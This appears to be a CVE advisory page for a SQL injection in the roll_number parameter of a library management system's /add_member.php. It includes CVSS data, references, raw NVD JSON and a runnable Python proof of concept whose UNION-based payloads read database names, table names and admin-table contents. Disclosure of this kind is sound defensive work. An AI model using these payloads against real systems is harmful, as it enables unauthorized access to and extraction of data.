CVE-2025-13254

Description

A vulnerability was identified in projectworlds Advanced Library Management System 1.0. This vulnerability affects unknown code of the file /add_member.php. Such manipulation of the argument roll_number leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:projectworlds:advanced_library_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Advanced Library Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import sys # CVE-2025-13254 SQL Injection PoC # Target: Advanced Library Management System 1.0 # File: /add_member.php # Parameter: roll_number def exploit_sqli(target_url): """ SQL Injection Exploitation This PoC demonstrates the vulnerability in roll_number parameter """ endpoint = f"{target_url}/add_member.php" # Normal request (should work) normal_data = { 'roll_number': 'STU001', 'name': 'Test User', 'email': '[email protected]', 'phone': '1234567890' } # Malicious payload - SQL Injection # Using UNION-based injection to extract database information malicious_payloads = [ "STU001' UNION SELECT NULL-- ", "STU001' UNION SELECT database(),user(),version()-- ", "STU001' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()-- ", "STU001' AND (SELECT COUNT(*) FROM admin_users)>0-- " ] print("[*] CVE-2025-13254 SQL Injection PoC") print(f"[*] Target: {target_url}") print("[*] Exploiting roll_number parameter...") for i, payload in enumerate(malicious_payloads, 1): print(f"\n[*] Test payload {i}: {payload}") try: data = normal_data.copy() data['roll_number'] = payload response = requests.post(endpoint, data=data, timeout=10) print(f"[*] Status Code: {response.status_code}") if 'error' not in response.text.lower() and response.status_code == 200: print("[+] Potential vulnerability confirmed!") print(f"[+] Response length: {len(response.text)}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] PoC execution completed") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13254.py <target_url>") print("Example: python cve-2025-13254.py http://localhost:8080") sys.exit(1) exploit_sqli(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13254
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13254
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13254/
[4] VulDB https://vuldb.com/cve/CVE-2025-13254
[5] https://github.com/Wyg2002yx/cve/blob/main/002/report.md
[6] https://vuldb.com/?ctiid.332589
[7] https://vuldb.com/?id.332589
[8] https://vuldb.com/?submit.687854

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13254", "sourceIdentifier": "[email protected]", "published": "2025-11-17T01:15:44.560", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in projectworlds Advanced Library Management System 1.0. This vulnerability affects unknown code of the file /add_member.php. Such manipulation of the argument roll_number leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectworlds:advanced_library_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "10EA1074-EEBC-4A5A-97F7-34C5E3181CB8"}]}]}], "references": [{"url": "https://github.com/Wyg2002yx/cve/blob/main/002/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332589", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332589", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.687854", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}